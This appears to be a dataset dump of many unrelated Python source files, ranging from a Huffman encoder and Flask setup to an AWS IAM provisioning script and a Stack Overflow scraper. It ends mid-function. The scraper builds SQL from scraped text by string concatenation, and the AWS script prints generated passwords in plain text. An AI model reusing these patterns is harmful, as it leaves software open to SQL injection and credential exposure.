text stringlengths 8 6.05M |
|---|
from collections import Counter, namedtuple
from heapq import heapify, heappush, heappop
class Node(namedtuple("Node", ['left', 'rigth'])):
def walk(self, code, acc):
self.left.walk(code, acc + "0")
self.rigth.walk(code, acc + "1")
class Leaf(namedtuple("Leaf", ["name"])):
def walk(self, code, acc):
code[self.name] = acc or "0"
def huffman_encode(s):
# h = [(freq, Leaf(ch)) for ch, freq in Counter(s).items()]
h = []
for ch, freq in Counter(s).items():
h.append((freq, len(h), Leaf(ch)))
heapify(h)
count = len(h)
while len(h) > 1:
freq1, _count1, left = heappop(h)
freq2, _count2, right = heappop(h)
heappush(h, (freq1 + freq2, count, Node(left, right)))
count += 1
[(_freq, _count, root)] = h
code = {}
root.walk(code, "")
return code
def decode(s_encoded, code):
res = ''
enc_symb = ''
for symb in s_encoded:
enc_symb += symb
for dec_symb in code:
if code.get(dec_symb) == enc_symb:
res += dec_symb
enc_symb = ''
break
return res
def main():
s = input()
code = huffman_encode(s)
s_encoded = "".join(code[ch] for ch in s)
print(len(code), len(s_encoded))
for ch in code:
print("{}: {}".format(ch, code[ch]))
print(s_encoded)
if __name__ == "__main__":
main()
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from flask_uuid import FlaskUUID
from flask_httpauth import HTTPBasicAuth
app = Flask(__name__)
FlaskUUID(app)
auth = HTTPBasicAuth()
app.config.from_object('config')
config = app.config
db = SQLAlchemy(app)
from models import Users
from app import views, models
|
#!/usr/bin/python3
'''network module'''
import urllib.request
with urllib.request.urlopen('https://intranet.hbtn.io/status')as response:
html = response.read()
print("Body response:\n\t- type: {}\n\t- content: {}\n\t- utf8 content: {}"
.format(type(html), html, html.decode()))
|
import RPi.GPIO as GPIO
from time import sleep
GPIO.setmode(GPIO.BOARD) # Reference pins by numerical position
#GPIO.setmode(GPIO.BCM) # Reference pins by BCM label value
ledPins = [11,13,15]
for pin in ledPins:
GPIO.setup(pin, GPIO.OUT) #set pin as output
i = 1
try:
while True:
GPIO.output(11, GPIO.HIGH) # Turn the pin on
sleep(.6)
GPIO.output(11, False) # Turn the pin off
#sleep(.6)
GPIO.output(13, True)
sleep(.6)
GPIO.output(13, False)
#sleep(.6)
GPIO.output(15, True)
sleep(.6)
GPIO.output(15, False)
sleep(.4)
GPIO.output(11, True)
GPIO.output(13, True)
GPIO.output(15, True)
sleep(.6)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
sleep(.6)
GPIO.output(15, True) # Turn the pin on
sleep(.6)
GPIO.output(15, False) # Turn the pin off
#sleep(.6)
GPIO.output(13, True)
sleep(.6)
GPIO.output(13, False)
#sleep(.6)
GPIO.output(11, True)
sleep(.6)
GPIO.output(11, False)
sleep(.4)
GPIO.output(11, True)
GPIO.output(13, True)
GPIO.output(15, True)
sleep(.6)
GPIO.output(11, False)
GPIO.output(13, False)
GPIO.output(15, False)
sleep(.6)
i = i+1
except KeyboardInterrupt:
print "Cleaning up...\n"
GPIO.cleanup() # Clear the state of all pins
print "All clean :)"
|
# -*- coding: utf-8 -*-
import logging
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("robobrowser").setLevel(logging.ERROR)
|
from source import tools
from source.constants import EN1_JSONPATH,ST_VIDEOPATH,SRC_SIZE
from source.states import main_menu,maps,end_stat
from source.component import player,enemys
import json
import pygame.sprite as sprite
'''
偏移 600
max map 7680
'''
def play_video():
tools.play_video(ST_VIDEOPATH, SRC_SIZE)
def main():
ends = end_stat.End_s()
game = tools.Game()
states_0 = main_menu.MainMenu() # 主菜单
states_1 = maps.MapCon() # 地图控制
p1 = player.PlayerCO('1')
file =open(EN1_JSONPATH,'r', encoding='UTF-8')
data=json.load(file)
en1s = sprite.Group()
for i in data['enemy_01']:
print(i)
en1s.add(enemys.Enemys(i["X"], i["Y"],'1'))
en2s = sprite.Group()
for i in data['enemy_02']:
print(i)
en2s.add(enemys.Enemys(i["X"], i["Y"],'2'))
en_boos = enemys.Enemys(int(data["boos"][0]["X"]),int(data["boos"][0]["Y"]),"3") # boos
file.close()
en_boom = enemys.Bomb()
game.run(states_0,states_1,p1,en1s,en2s,en_boos,en_boom,ends)
if __name__ == '__main__':
# # try:
# if callable(play_video()):
# play_video()
main()
# except:
# print("ex")
# else:
# print("==")
|
from ..extenstions import celery
def config_to_celery_kwargs(config):
return {
k.replace('CELERY_', '').lower(): v
for k, v in dict(config).items()
if k.startswith('CELERY')
}
def create_celery(app):
"""
Configures celery instance from application, using it's config
:param app: Flask application instance
:return: Celery instance
"""
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery_config = config_to_celery_kwargs(app.config)
print('Celery config: ', celery_config)
celery.conf.update(**celery_config)
print('Celery broker: ' + str(celery.conf.get('broker_url')))
celery.Task = ContextTask
return celery
|
#!/usr/bin/env python
import os
import sys
class Drone(object):
def __init__(self):
print "Starting account creation and buildup"
self.step = 0
from misc import Misc
from core.base import base
base = base()
if Misc.confirm(prompt="Are you sure you want to create an account infrastructure?", resp=False):
self.account = base.get_account_information()
if 'profile_name' in self.account['cli_arguments']:
print "Aws account has been provided"
else:
logger.error("Aws account not provided")
exit(1)
if 'region_name' in self.account['cli_arguments']:
print "Aws region has been provided"
else:
logger.error("Aws region not provided")
exit(1)
if 'session' in self.account and self.account['session'] is not (None or ""):
logger.info("Session object created succesfully")
else:
logger.error("Aws Session not created successfuly")
exit(1)
self.run_workflow()
else:
print "You are not prepared - Illidian"
def increment_step(self):
self.step += 1
return self.step
def run_workflow(self):
from misc import Misc
from core.awsrequests import awsrequests
AWSreq = awsrequests(session=self.account['session'])
region = self.account['cli_arguments']['region_name']
print ""
print "Step %s: Creating ec2 keys" % (self.increment_step(),)
if not Misc.confirm("Has the keys for all envs been created with syntax default-env syntax?", resp=True):
exit(1)
print ""
print "Step %s: Creating bucket for cloudformation" % (self.increment_step(),)
if Misc.confirm("Should we create the s3 bucket for cloudformation?", resp=True):
bucket_name = raw_input("What should the bucket name be (ex: xively-devops-templates-dr ): ")
AWSreq.create_s3_bucket(name=bucket_name, location=region)
else:
print "Assuming bucket is already created"
bucket_name = raw_input("What is the bucket name?")
print ""
print "Step %s: Upload xively_cloudformation repo to the s3 bucket" % (self.increment_step(),)
while not Misc.confirm("Is the upload finished?", resp=False):
print "Finish upload before continue"
print ""
print "Step %s: Run cloudformation template for infrastructure?" % (self.increment_step(),)
if Misc.confirm("Should we run the cloudformation template", resp=False):
# FIXME test if works
cloudformation_template_name = raw_input(
"What is the name of template to run (ex. VPC_dr_account.template ): ")
url = "https://s3.amazonaws.com/" + bucket_name + "/" + cloudformation_template_name
awsrequests.create_cloudformation_stack(stackname="vpc-infrastructure", templateurl=url)
else:
print "Assuming the stack has already been run."
print ""
print "Step %s: Run cloudformation template for users base" % (self.increment_step(),)
if Misc.confirm("Should we run the cloudformation template?", resp=False):
# FIXME test if works
cloudformation_template_name = raw_input(
"What is the name of template to run (ex. prod_account_iam.template ): ")
url = "https://s3.amazonaws.com/" + bucket_name + "/" + cloudformation_template_name
awsrequests.create_cloudformation_stack(stackname="devops-users", templateurl=url)
else:
print "Assuming the stack has already been run."
devops_groupname = raw_input("Name of the generated devops group? ")
print ""
print "Step %s: Start amon.py to deploy to environement" % (self.increment_step(),)
while not Misc.confirm("Is the packer generation started", resp=False):
print "Start before we continue"
print ""
print "Step %s: Creating devops users" % (self.increment_step(),)
devops_yaml = Misc.get_yaml(yamlfile="devops_users.yaml")
for user in devops_yaml['users']:
print "Checking user %s" % (user,)
create_password = True
if not AWSreq.iam_user_exists(username=user):
print "Creating user %s" % (user,)
AWSreq.create_iam_user(username=user, dryrun=False, path="/")
else:
login_profile = AWSreq.get_login_profile(username=user)
if login_profile is not None:
create_password = False
if create_password:
user_password = Misc.generate_password(size=10)
AWSreq.create_iam_login_profile(username=user, password=user_password)
print "Username: %s generated password is: %s" % (user, user_password)
user_groups = AWSreq.iam_user_groups(username=user)
if devops_groupname not in user_groups[user]:
print "Need to add to group"
AWSreq.add_iam_user_to_group(username=user, groupname=devops_groupname)
if __name__ == '__main__':
root_dir = os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0])))
os.environ['KERRIGAN_ROOT'] = root_dir
kerrigan_lib_dir = "%s/lib" % (root_dir,)
sys.path.append(kerrigan_lib_dir)
kerrigan_lib_dir = "%s/lib-char" % (root_dir,)
sys.path.append(kerrigan_lib_dir)
from misc.Logger import logger
logger.debug('Starting Drone')
Drone()
|
"""Metafeatures build for the Gridworld environment."""
import typing as t
import warnings
import numpy as np
import scipy.stats
import test_envs.gridworld
def ft_goal_dist_euclid(env):
start = np.asarray(list(env.start), dtype=float)
goals = np.asarray(list(env.goals), dtype=float)
dists = np.linalg.norm(goals - start, ord=2, axis=0)
return dists
def ft_goal_dist_manh(env):
start = np.asarray(list(env.start), dtype=float)
goals = np.asarray(list(env.goals), dtype=float)
dists = np.linalg.norm(goals - start, ord=1, axis=0)
return dists
def ft_trap_dist_euclid(env):
start = np.asarray(list(env.start), dtype=float)
traps = np.asarray(list(env.traps), dtype=float)
dists = np.linalg.norm(traps - start, ord=2, axis=0)
return dists
def ft_trap_dist_manh(env):
start = np.asarray(list(env.start), dtype=float)
traps = np.asarray(list(env.traps), dtype=float)
dists = np.linalg.norm(traps - start, ord=1, axis=0)
return dists
def _in_radius_vals(env, values: np.ndarray, radius_prop: float):
assert 0 < radius_prop <= 1
width = env.width
height = env.height
radius = radius_prop * 0.5 * (width + height)
return values[values <= radius]
def ft_goal_radial_dist(env, radius_prop: float = 0.5):
euclid_dists = ft_goal_dist_euclid(env)
return _in_radius_vals(env, values=euclid_dists, radius_prop=radius_prop)
def ft_trap_radial_dist(env, radius_prop: float = 0.5):
euclid_dists = ft_trap_dist_euclid(env)
return _in_radius_vals(env, values=euclid_dists, radius_prop=radius_prop)
def ft_wall_patch_prop(env, patch_prop: float = 0.2):
start_y, start_x = np.asarray(list(env.start), dtype=int)
half_width = 0.5 * patch_prop * env.width
half_height = 0.5 * patch_prop * env.height
min_y = max(0, start_y - int(half_height))
max_y = min(env.height - 1, start_y + int(np.ceil(half_height))) + 1
min_x = max(0, start_x - int(half_width))
max_x = min(env.width - 1, start_x + int(np.ceil(half_width))) + 1
patch = env.map[min_y:max_y, :][:, min_x:max_x]
return np.mean(patch == test_envs.gridworld.CellCode.WALL)
summary_functions = {
"mean": np.mean,
"std": np.std,
"max": np.max,
"min": np.min,
"median": np.median,
"kurtosis": scipy.stats.kurtosis,
"skewness": scipy.stats.skew,
"sum": np.sum,
"len": len,
}
def summarize(
feature: str, values: t.Union[float, np.ndarray]
) -> t.Tuple[t.List[str], t.List[float]]:
if feature.startswith("ft_"):
feature = feature[3:]
if np.isscalar(values):
return [feature], [values]
mtf_names = [] # type: t.List[str]
mtf_vals = [] # type: t.List[float]
for summ_name, summ_func in summary_functions.items():
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
mtf_vals.append(summ_func(values))
except ValueError:
mtf_vals.append(np.nan)
mtf_names.append(f"{feature}.{summ_name}")
return mtf_names, mtf_vals
def _test():
ft = ["ab", "ft_cd", "ft_ef"]
vals = [[1.0, 2.0], [-7, 7], 0]
for ft_name, ft_vals in zip(ft, vals):
print(summarize(ft_name, ft_vals))
if __name__ == "__main__":
_test()
|
def juros_compostos():
lista = list()
x = int(input("Digite o Capital Inicial a ser investido: "))
taxa_mensal = float(input("Digite a Taxa Mensal de Juros: "))
Montante_posterior = x
n = 1
while n <=12:
Montante_posterior = Montante_posterior + Montante_posterior*taxa_mensal
n = n + 1
taxa_anual = Montante_posterior/x
variação_taxas = taxa_anual/taxa_mensal
lista.append(taxa_anual)
lista.append(variação_taxas)
return (lista)
def calculo_taxa_mensal():
a = juros_compostos()
taxa_mensal = a[0]/ a[1]
calculo_taxa_mensal()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 4 14:49:27 2020
@author: nerohmot
"""
import struct
from . import command_ABC
class SET_RAIL_STATUS(command_ABC):
'''
Description: set the desired status (on/off) of all rails
Input: the desired status of the rails
| Index | Name | Type | Description |
|:-----:|:------------|:--------|:-----------------------------------|
|0 | RAIL1_STAT | uint8 | RAIL1 status (0=off, 1=on) |
|1 | RAIL2_STAT | uint8 | RAIL2 status (0=off, 1=on) |
|2 | P25V0D_STAT | uint8 | P25V0D status (0=off, 1=on) |
|3 | P17V0D_STAT | uint8 | P17V0D status (0=off, 1=on) |
|4 | N7V0D_STAT | uint8 | N7V0D status (0=off, 1=on) |
|5 | P15V0A_STAT | uint8 | P15V0A status (0=off, 1=on) |
|6 | N15V0A_STAT | uint8 | N15V0A status (0=off, 1=on) |
|7 | P5V0D_STAT | uint8 | P5V0D status (0=off, 1=on) |
|8 | P5V0A_STAT | uint8 | P5V0A status (0=off, 1=on) |
|9 | N5V0A_STAT | uint8 | N5V0A status (0=off, 1=on) |
|10 | P3V3D_STAT | uint8 | P3V3D status (0=off, 1=on) |
|11 | PVLB_STAT | uint8 | PVLB status (0=off, 1=on) |
|12 | P5V0R_STAT | uint8 | P5V0R status (0=off, 1=on) |
Output: the new (current) status of the rails
| Index | Name | Type | Description |
|:-----:|:------------|:--------|:-----------------------------------|
|0 | RAIL1_STAT | uint8 | RAIL1 status (0=off, 1=on) |
|1 | RAIL2_STAT | uint8 | RAIL2 status (0=off, 1=on) |
|2 | P25V0D_STAT | uint8 | P25V0D status (0=off, 1=on) |
|3 | P17V0D_STAT | uint8 | P17V0D status (0=off, 1=on) |
|4 | N7V0D_STAT | uint8 | N7V0D status (0=off, 1=on) |
|5 | P15V0A_STAT | uint8 | P15V0A status (0=off, 1=on) |
|6 | N15V0A_STAT | uint8 | N15V0A status (0=off, 1=on) |
|7 | P5V0D_STAT | uint8 | P5V0D status (0=off, 1=on) |
|8 | P5V0A_STAT | uint8 | P5V0A status (0=off, 1=on) |
|9 | N5V0A_STAT | uint8 | N5V0A status (0=off, 1=on) |
|10 | P3V3D_STAT | uint8 | P3V3D status (0=off, 1=on) |
|11 | PVLB_STAT | uint8 | PVLB status (0=off, 1=on) |
|12 | P5V0R_STAT | uint8 | P5V0R status (0=off, 1=on) |
'''
command = 0x03
sub_command = 0x07
default_send_payload = struct.pack('BBBBBBBBBBBBB',
1, # RAIL1 on
1, # RAIL2 on
1, # P25V0D on
1, # P17V0D on
1, # N7V0D on
1, # P15V0A on
1, # N15V0A on
1, # P5V0D on
1, # P5V0A on
1, # N5V0A on
1, # P3V3D on
1, # PVLB on
1) # P5V0R on
def receive(self, DA, ACK, RXTX, PAYLOAD):
line = f"DA={DA} CMD={self.command} SCMD={self.sub_command} ACK={ACK} RXTX={RXTX} PAYLOAD={PAYLOAD}"
self.parent.output_te.append(line)
|
from lxml import html
import requests
import sqlite3
from time import sleep
base_url = 'http://stackoverflow.com'
conn = sqlite3.connect('morpheus11.db')
conn2 = sqlite3.connect('morpheus11.db')
keywords = ['cbind', 'rbind', 'filter', 'gather', 'group_by', 'inner_join', 'mutate', 'select', 'separate', 'spread', 'summarise', 'unite']
c = conn.cursor()
c2 = conn2.cursor()
# Create table
c.execute('''CREATE TABLE post_tb
(myurl text, offset text, vote text, code text)''')
cnt = 1
urls = []
for row in c.execute('SELECT url FROM topic_tb'):
myurl = base_url + row[0]
urls.append(myurl)
conn.close()
for myurl in urls:
try:
print 'Request------------------', 'index:', cnt, myurl
cnt = cnt + 1
page = requests.get(myurl)
tree = html.fromstring(page.content)
accept_ans = tree.xpath('//*[@class="answer accepted-answer"]')
other_ans = tree.xpath('//*[@class="answer"]')
if len(accept_ans) > 0:
accept_code_list = accept_ans[0].xpath('table/tr[1]/td[2]/div/pre/code/text()')
acp_vote = '-2'
acp_vote_list = accept_ans[0].xpath('table/tr[1]/td[1]/div/span[1]/text()')
if len(acp_vote_list) > 0:
acp_vote = acp_vote_list[0]
acpt_code = "#morpheus#".join(accept_code_list)
flag = False
for key in keywords:
if key in acpt_code:
flag = True
break
if len(accept_code_list) > 0 and flag:
#print 'acpt:', acpt_code, 'vote:', acp_vote
acpt_code = acpt_code.replace("\"", "")
sql = "INSERT INTO post_tb VALUES (\"" + myurl + "\",\""+ str(1) +"\",\""+ acp_vote +"\",\""+ acpt_code + "\")"
#print sql
c2.execute(sql)
num = 2
for other in other_ans:
other_code = other.xpath('table/tr[1]/td[2]/div/pre/code/text()')
if len(other_code) == 0:
continue
other_vote_list = other.xpath('table/tr[1]/td[1]/div/span[1]/text()')
other_vote = '-2'
if len(other_vote_list) > 0:
other_vote = other_vote_list[0]
#print '------------------------------------'
others = "#morpheus#".join(other_code)
flag = False
for key in keywords:
if key in others:
flag = True
break
if not flag:
continue
#print 'other:', others, 'vote:', other_vote
others = others.replace("\"", "")
sql = "INSERT INTO post_tb VALUES (\"" + myurl + "\",\""+ str(num) +"\",\""+ other_vote +"\",\""+ others + "\")"
#print sql
c2.execute(sql)
num = num +1
conn2.commit()
sleep(5)
except Exception as inst:
print "Exception!", inst
conn2.close()
#page = 'http://stackoverflow.com/questions/29679381/tidyr-wide-to-long'
#page = 'http://stackoverflow.com/questions/29775461/tidyr-repeated-measures-multiple-variables-wide-format'
|
print('Calcula o peso ideal')
altura = float(input('Informe sua altura: '))
peso_ideal = (72.7 * altura) - 58
print('Seu peso ideal é {:.2f} kg'.format(peso_ideal))
|
distancia = float(input('Qual a distância em km: '))
velocidade = float(input('Qual a velocidade média em km/h: '))
tempo = distancia / velocidade
print(f'O tempo de viagem será de: {tempo:.1f} horas ')
|
import sys
import json
import struct
import logging
from config import DAEMON_VERSION, ACTIONS
class Messenger:
"""
Handles the sending and receiving of messages to and from the addon using stdio.
:param version str: the current major python version
"""
def __init__(self, version):
self.stdout, self.stdin = self.get_stdio_handle(version)
def get_stdio_handle(self, python_version):
"""
Gets the stdin and stdout handles depending on the current python version.
Python 2.x uses 'sys.stdout.xxx', whereas python 3.x uses 'sys.stdout.buffer.xxx'.
:return: (stdout handle, stdin handle) based on the current python version
:rType: tuple
"""
if python_version == 2:
return (sys.stdout, sys.stdin)
else:
return (sys.stdout.buffer, sys.stdin.buffer)
def decode_message(self, encoded_length):
"""
Decodes a message received from stdin.
:param encoded_length buffer: the buffer containing the data length
:return: the decoded message
:rType: object
"""
data_length = struct.unpack('@I', encoded_length)[0]
message = self.stdin.read(data_length).decode('utf-8')
return json.loads(message)
def encode_message(self, message):
"""
Encodes a message to be sent to stdout.
:param message object: the message to encode
:return: (length of encoded message, encoded message)
:rType: tuple
"""
json_string = json.dumps(message).encode('utf-8')
buffer_length = struct.pack('@I', len(json_string))
return (buffer_length, json_string)
def get_message(self):
"""
Reads message from addon in stdin.
:return: the decoded message
:rType: str
"""
encoded_length = self.stdin.read(4)
if len(encoded_length) == 0:
logging.error('Failed to read data from stdin')
sys.exit(0)
return self.decode_message(encoded_length)
def send_message(self, message_object):
"""
Sends a message to stdout.
:param message [Message|ErrorMessage]: the message to encode and send
"""
length, encoded_message = self.encode_message(message_object.getMessage())
self.stdout.write(length)
self.stdout.write(encoded_message)
self.stdout.flush()
|
/Users/daniel/anaconda/lib/python3.6/random.py |
from django.db import models
from authtools.models import AbstractNamedUser
from localflavor.us.models import PhoneNumberField
class User(AbstractNamedUser):
phone = PhoneNumberField()
def username():
return self.email
class Meta:
db_table = 'auth_user'
permissions = (
('manager_promotions', 'Manage promotions'),
)
def __unicode__(self):
return self.name
|
# -*- coding: utf-8 -*-
class Solution:
def getMaximumGenerated(self, n: int) -> int:
nums, result = [0] * (n + 1), 0
for i in range(1, n + 1):
if i == 1:
nums[i] = 1
elif i % 2 == 0:
nums[i] = nums[i // 2]
elif i % 2 == 1:
nums[i] = nums[i // 2] + nums[i // 2 + 1]
result = max(result, nums[i])
return result
if __name__ == "__main__":
solution = Solution()
assert 3 == solution.getMaximumGenerated(7)
assert 1 == solution.getMaximumGenerated(2)
assert 2 == solution.getMaximumGenerated(3)
|
"""
compile & install FlyCap2 for windows and linux.
Directory should appear something like:
PyCapture2
|-doc
| |-FlyCap2 documentation.chm
| +-FlyCap2 documentation.pdf
|
|-src
| |-python2
| | +-PyCapture2.c
| |
| |-python3
| | +-PyCapture2.c
|
|-examples
| |-python2
| | + <python 2 examples>
| +-python3
| + <python 2 examples>
|
|-setup.py
|-README.txt
|-README_Linux.txt
|-README_MacOS.txt
"""
import os
import platform
import numpy as np
try:
from setuptools import setup
from setuptools.extension import Extension
except ImportError:
from distutils import setup
from distutils.extension import Extension
import struct
import sys
def getReadme():
if os.name == 'posix':
if platform.system() == 'Darwin':
filedata = open("README_MacOS.txt")
else:
filedata = open("README_Linux.txt")
else:
filedata = open("README.txt")
desc = filedata.read()
filedata.close()
return desc
os.chdir(sys.path[0]) #Change working directory to the script's directory
#if operating system is linux:
if os.name == 'posix':
libDir = r'..\..\lib'
incDir = r'..\..\include\C'
libName = 'flycapture-c'
libVideoName = 'flycapturevideo-c'
#if operating system is windows:
else:
#winreg has different names in python 2 & 3
if sys.version_info[0] < 3:
import _winreg as winreg
else:
import winreg
#check if 32 or 64bit python - installed flycapture 2 must match!
if struct.calcsize("P") == 8: #64bit
libDir = os.path.abspath(r'..\..\lib64\C')
else: #not 64bit - 32bit
libDir = os.path.abspath(r'..\..\lib\C')
incDir = os.path.abspath(r'..\..\include\C')
libName = 'FlyCapture2_C'
libVideoName = 'FlyCapture2Video_C'
#python 2 and python 3 are different - each must be cythonized differently.
if sys.version_info[0] < 3:
srcDir = os.path.normcase(r'src/python2/')
else:
srcDir = os.path.normcase(r'src/python3/')
#put include path, library, etc into extension
extensions = [
Extension('PyCapture2', [srcDir + r'PyCapture2.c'],
include_dirs = [incDir, np.get_include()],
library_dirs = [libDir],
libraries = [libName, libVideoName]
)
]
#specify docs, create list of all additional files to add.
eventsTable = ('', ['pgr_events_table.dat'])
dataFiles = [eventsTable]
#get version from arguments (if it exists)
if '--setVer' in sys.argv:
verInd = sys.argv.index('--setVer')
sys.argv.remove('--setVer')
ver = sys.argv[verInd]
sys.argv.remove(ver)
else:
ver = ''
setup(
name = "PyCapture2",
version = ver,
author = "FLIR Integrated Imaging Solutions, Inc",
description = "A python wrapper for the FlyCapture 2 library.",
url = "https://www.ptgrey.com/",
long_description = getReadme(),
data_files = dataFiles,
ext_modules = extensions
)
|
from wtforms import Form
from wtforms import StringField, PasswordField, BooleanField, TextAreaField
from wtforms.fields.html5 import EmailField
from wtforms import validators
from .models import User
def user_validator(form, field):
if field.data=='adsi' or field.data=='Adsi':
raise validators.ValidationError('El username adsi no es permitido')
class LoginForm(Form):
username = StringField('Username',[
validators.length(min=4, max=50, message='El nombre de usuario debe encontrarse entre 4 y 50 caracteres de largo..')
])
password = PasswordField('Password',[
validators.Required(message='El password es requerido')
])
class RegisterForm(Form):
username = StringField('Username',[
validators.length(min=4, max=50),
user_validator
])
email = EmailField('Correo electronico',[
validators.length(min=6, max=100),
validators.Required(message='El email es requerido'),
validators.Email(message='Ingrese un email valido')
])
mobile = StringField('Mobile', [
validators.length(min = 5, max = 100)
])
user_photo = StringField('Photo', [
validators.length(min = 5, max = 225)
])
password = PasswordField('Password',[
validators.Required('La contraseña es requerida.'),
validators.EqualTo('confirm_password', message='La contraseña no coinside')
])
confirm_password = PasswordField('Confirmar Contraseña')
accept = BooleanField('Acepto terminos y condiciones',[
validators.DataRequired()
])
def validate_username(self, username):
if User.get_by_username(username.data):
raise validators.ValidationError('El usuario ya se encuentra registrado.')
def validate_email(self, email):
if User.get_by_email(email.data):
raise validators.ValidationError('El email ya se encuentra registrado.')
#def validate(self): #views line:38.
# if not Form.validate(self):
# return False
# if len(self.password.data) < 3 :
# self.password.errors.append('La contraseña es muy corta')
# return False
# return True
class TaskForm(Form):
article_photo = StringField('Article Photo',[
validators.DataRequired(message='The photo of the item is required')
])
name_article = StringField('Naeme article',[
validators.length(min=4, max=50, message = 'Name out of range'),
validators.DataRequired(message='Name is required')
])
article_description = TextAreaField('Description',[
validators.DataRequired(message='Description is required.')
], render_kw = {'rows':5})
article_address = StringField('Article Adress',[
validators.DataRequired(message='The address where the item is located is required')
])
article_expires = StringField('Article Expires',[
validators.DataRequired(message='The expiration date of the item is required')
])
|
from PIL import Image
import serial
import time #from time import sleep
import winsound
bluetooth= serial.Serial('COM7',115200,timeout=1)
picSize = 120*184
camBuffer=b''
dataNum = 0
offset = 100
image = offset
receiveTime = time.process_time_ns()
data_time = time.process_time_ns()
while image < offset+100 :
dataRead = bluetooth.inWaiting()
if (dataRead > 0):
if (time.process_time_ns() - receiveTime >= 1*1000*1000*1000):
camBuffer = b''
dataNum = 0
camBuffer += bluetooth.read(dataRead)
dataNum += dataRead
receiveTime = time.process_time_ns()
if (dataNum >= picSize):
print(image)
winsound.Beep(440, 300)
img = Image.frombytes('L',(184,120),camBuffer)
name = "img-"+str(image).zfill(3)+".bmp"
img.save(name,"bmp")
image = image+1
camBuffer = b''
dataNum = 0
print(time.process_time_ns()/1000/1000/1000) |
# Generated by Django 2.2.1 on 2019-05-24 23:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('yb_app', '0002_board_iscomplete'),
]
operations = [
migrations.AlterField(
model_name='board',
name='content',
field=models.TextField(default=''),
),
]
|
import random
import pygame
class MyFaceClass(pygame.sprite.Sprite):
def __init__(self, image_file, location, width, height):
pygame.sprite.Sprite.__init__(self)
self.image = pygame.image.load(image_file)
self.rect = self.image.get_rect()
self.rect.left, self.rect.top = location
self.width = width
self.height = height
self.sx = 10
self.sy = 10
def move(self):
self.rect = self.rect.move((self.sx, self.sy))
self._change_speed()
def _change_speed(self):
# self.sx, self.sy = self._raise(self.sx), self._raise(self.sy)
if self.rect.left < 0 or self.rect.right > self.width:
self.sx = -self.sx
if self.rect.top < 0 or self.rect.bottom > self.height:
self.sy = -self.sy
@staticmethod
def _raise(x):
ratio = random.random() * 2 - 1
x = int(x * ratio)
return x
if __name__ == '__main__':
width = 480
height = 640
size = (width, height)
screen = pygame.display.set_mode(size)
screen.fill([255, 255, 255])
img_file = "red_face.jpg"
faces = []
num = 3
for row in range(0, num):
for column in range(0, num):
location = [column * 180 + 10, row * 180 + 10]
face = MyFaceClass(img_file, location, width, height)
faces.append(face)
for face in faces:
screen.blit(face.image, face.rect)
pygame.display.flip()
# Keep the window alive...
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
pygame.time.delay(20)
screen.fill([255, 255, 255])
for face in faces:
face.move()
screen.blit(face.image, face.rect)
pygame.display.flip()
pygame.quit()
|
# remove comments
import numpy as np
import os
# rotate a vector by an angle theta around unit vector u
# u = []
def rotate3D(theta, unitVec, vector):
ux = unitVec[0]
uy = unitVec[1]
uz = unitVec[2]
c = np.cos(theta)
s = np.sin(theta)
# make rotation matrix
# see https://en.wikipedia.org/wiki/Rotation_matrix
R11 = c + ux*ux*(1 - c)
R12 = ux*uy*(1 - c) - uz*s
R13 = ux*uz*(1 - c) + uy*s
R21 = uy*ux*(1 - c) + uz*s
R22 = c + uy*uy*(1 - c)
R23 = uy*uz*(1 - c) - ux*s
R31 = uz*ux*(1 - c) - uy*s
R32 = uz*uy*(1 - c) + ux*s
R33 = c + uz*uz*(1 - c)
x = vector[0]
y = vector[1]
z = vector[2]
xPrime = x*R11 + y*R12 + z*R13
yPrime = x*R21 + y*R22 + z*R23
zPrime = x*R31 + y*R32 + z*R33
vector[0] = xPrime
vector[1] = yPrime
vector[2] = zPrime
return
# return u cross v
def cross3D(u, v):
wx = u[1]*v[2] - u[2]*v[1]
wy = -(u[0]*v[2] - v[0]*u[2])
wz = u[0]*v[1] - v[0]*u[1]
return [wx, wy, wz]
# angle between 2 vector u and v
def angleRad(u, v):
ndim = len(u)
uv = 0
# dot
for d in range(ndim):
uv += u[d]*v[d]
# magnitude u and v
magU = 0
magV = 0
for d in range(ndim):
magU += u[d]*u[d]
magV += v[d]*v[d]
if magU*magV != 0:
costheta = uv/(np.sqrt(magU)*np.sqrt(magV))
return np.arccos(costheta)
# normalize a vector
# work for 2D and 3D
def norm(u):
ndim = len(u)
mag = 0.0
for d in range(ndim):
mag += u[d]*u[d]
if mag != 0:
mag = np.sqrt(mag)
for d in range(ndim):
u[d] /= mag
return
# work for 2D and 3D
def distance(u, v):
distSq = 0
ndim = len(u)
for d in range(ndim):
distSq += (u[d] - v[d])*(u[d] - v[d])
return np.sqrt(distSq)
# box = [[xlo, xhi],[ylo, yhi]]
def checkOutside(point, box):
dx = dy = 0
x = point[0]
y = point[1]
xlo = box[0][0]
xhi = box[0][1]
ylo = box[1][0]
yhi = box[1][1]
if x < xlo:
dx = 1
if x > xhi:
dx = -1
if y < ylo:
dy = 1
if y > yhi:
dy = -1
out = (dx != 0 or dy != 0)
return out, [dx, dy]
#get the first number in the fist line in file
def get_fist_num_infile(s_infile):
h = open(s_infile, 'r')
fist_num = int(h.read().split()[0])
h.close()
return fist_num
def remove_comment(txt):
cc = ['#', '!', '//']
for c in cc:
n = txt.find(c)
if n > -1: return txt[0:n]
return txt
# af = array of float
# f = float
# b = bool
# i = int
# s = string
# aw = array of words
# ARG = filename, key, type OR
# filename, session, key, type
def read_from_input(*argc):
narg = len(argc)
file_name = argc[0]
f = open(file_name, 'r')
if narg == 3:
key = argc[1]
type = argc[2]
lines = f.readlines()
elif narg == 4:
session = argc[1]
key = argc[2]
type = argc[3]
allLines = f.readlines()
lines = []
found = False
for aline in allLines:
if found:
lines.append(aline)
words = remove_comment(aline).split()
if (len(words) > 0) and words[0] == session:
found = True
for w in words:
if w == '}': found = False
else:
